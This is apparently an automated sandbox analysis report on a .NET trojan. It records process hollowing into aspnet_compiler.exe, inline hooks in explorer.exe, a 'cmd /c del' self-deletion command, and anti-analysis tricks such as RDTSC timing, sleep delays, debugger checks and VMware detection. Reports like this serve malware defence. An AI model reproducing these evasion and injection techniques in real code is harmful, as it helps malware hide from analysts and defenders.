        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C895D0 NtClose,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C899A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89540 NtReadFile,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89A80 NtOpenDirectoryObject,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89650 NtQueryValueKey,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89660 NtAllocateVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89670 NtQueryInformationProcess,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89A00 NtProtectVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89610 NtEnumerateValueKey,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89A10 NtQuerySection,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89A20 NtResumeThread,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C897A0 NtUnmapViewOfSection,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C8A3B0 NtGetContextThread,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89760 NtOpenProcess,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89770 NtSetInformationFile,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C8A770 NtOpenThread,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89B00 NtSetValueKey,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C8A710 NtOpenProcessToken,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89730 NtQueryVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C898F0 NtReadVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C898A0 NtWriteVirtualMemory,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C8B040 NtSuspendThread,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C89820 NtEnumerateKey,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C899D0 NtCreateProcessEx,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
        Source: U8RYIwIvfK.exe, 00000000.00000002.268661808.00000000027CA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.270167815.0000000004BA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000000.252749623.0000000000254000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268746824.00000000027DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBLACKDEVIL.dll6 vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exe, 00000000.00000002.268762286.00000000027E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exeBinary or memory string: OriginalFilenameBFXBNFDHDJNG.exe: vs U8RYIwIvfK.exe
        Source: U8RYIwIvfK.exeReversingLabs: Detection: 43%
        Source: U8RYIwIvfK.exeVirustotal: Detection: 38%
        Source: U8RYIwIvfK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\U8RYIwIvfK.exe C:\Users\user\Desktop\U8RYIwIvfK.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@11/1@2/2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001DA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
        Source: U8RYIwIvfK.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
        Source: U8RYIwIvfK.exe, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformBlock'
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206f????????????????????????????????????????.csCryptographic APIs: 'TransformFinalBlock'
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: U8RYIwIvfK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: U8RYIwIvfK.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: U8RYIwIvfK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdbBSJB source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: cmd.pdbUGP source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\Documents\CryptoObfuscator_Output\BLACKDEVIL.pdb source: U8RYIwIvfK.exe, 00000000.00000002.268596794.00000000027AC000.00000004.00000800.00020000.00000000.sdmp, U8RYIwIvfK.exe, 00000000.00000002.267385039.0000000002640000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000003.00000003.268178554.0000000000F19000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000003.369800371.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.367713798.00000000028E9000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.522093440.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.523600333.0000000002D3F000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: aspnet_compiler.pdb source: cmd.exe, 0000000E.00000002.524907250.00000000031EF000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000002.521097994.00000000027ED000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: BFXBNFDHDJNG.pdb source: U8RYIwIvfK.exe
        Source: Binary string: cmd.pdb source: aspnet_compiler.exe, 00000003.00000003.366743571.0000000000E20000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, cmd.exe, 0000000E.00000000.367246738.00000000001B0000.00000040.80000000.00040000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: U8RYIwIvfK.exe, u206a????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u206a????????????????????????????????????????.cs.Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9392A push dword ptr [ecx]; iretd
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9A25E push 11BA938Bh; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0112D0D1 push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C76BD push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C76D1 push ecx; ret
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02C9D0D1 push ecx; ret

        Hooking and other Techniques for Hiding and Protection

        barindex
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE9
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000129904 second address: 000000000012990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000129B6E second address: 0000000000129B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 1104Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exe TID: 3724Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01116DE6 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 5.3 %
        Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 0.7 %
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess information queried: ProcessInformation
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001C68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D31DC FindFirstFileW,FindNextFileW,FindClose,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001B85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeThread delayed: delay time: 922337203685477
        Source: explorer.exe, 00000004.00000000.328931675.00000000084D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000004.00000000.344274153.00000000045B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: explorer.exe, 00000004.00000000.351265830.00000000081DD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
        Source: explorer.exe, 00000004.00000000.320881970.0000000006710000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
        Source: explorer.exe, 00000004.00000000.326654154.0000000008304000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000004.00000000.294164608.00000000082B2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
        Source: explorer.exe, 00000004.00000000.351359914.0000000008200000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&

        Anti Debugging

        barindex
        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeCode function: 0_2_00A9B950 CheckRemoteDebuggerPresent,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001D2258 IsDebuggerPresent,
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001BAC30 GetProcessHeap,RtlFreeHeap,GetProcessHeap,RtlFreeHeap,
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01116DE6 rdtsc
        Source: C:\Users\user\Desktop\U8RYIwIvfK.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010D9100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0119E539 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0115A537 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_0110513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01104D3B mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_011A8D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010F4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010E3D34 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_010DAD30 mov eax, dword ptr fs:[00000030h]
